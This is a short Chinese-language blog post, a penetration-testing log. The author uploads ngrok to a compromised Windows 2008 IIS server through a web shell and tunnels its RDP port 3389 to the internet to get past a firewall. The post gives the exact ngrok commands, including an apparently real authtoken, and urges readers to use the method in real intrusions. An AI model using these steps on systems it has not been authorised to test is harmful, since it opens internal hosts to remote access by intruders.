跳到主要內容
Ngrok 內網端口轉發紀錄
Ngrok 內網端口轉發紀錄
作者 : Noth
前言 :
筆者在滲透的過程中,常常發現例如有開 3389 Port 有開,但不管如何自己都沒辦法進行 RDP,到後面才請教大神朋友,原來阿 ! 3389 Port 有可能只對內連不對外連,又或者有防火牆擋住,這時可以拿出一個神器 ngrok 進行端口轉發到外網 xD,進一步在去連接 !! 巧妙如斯~ 直接實作一次。
介紹 :
可以把外界的請求轉發到你本機指定的 Port ,也就是由 ngrok 產生一串公開的網址來讓外網存取你本機上的 Port,用來進行端口轉發,亦可用來滲透,是一個不錯的工具。
實作環境 :
攻擊者 : 192.168.111.130 ( Windows 10,內網)
受害者 : 192.168.111.131 (iis apppool\defaultapppool,Windows 2008,內網)
實作流程 :
先在 ngrok 官網下載 windows 版本
上傳 ngrok 到 C:/Windows/Temp 目錄下 :
在蟻劍 Terminal 執行端口轉發 :
ngrok64.exe authtoken 1ttRd9isTu7y8MOKc6UNbwLuhcQ_2MvLppdeUXGCgvuNnKRSY
ngrok64.exe tcp 3389
此時 ngrok tunnel 已經建立,接下來利用 mstsc 遠端連接
成功連接 :
接下來交給各位小夥伴去嘗試 xD 當然攻擊者入侵外網的時候也是相同的手法進行端口轉發,多實戰 .... 多實戰 ....
留言
張貼留言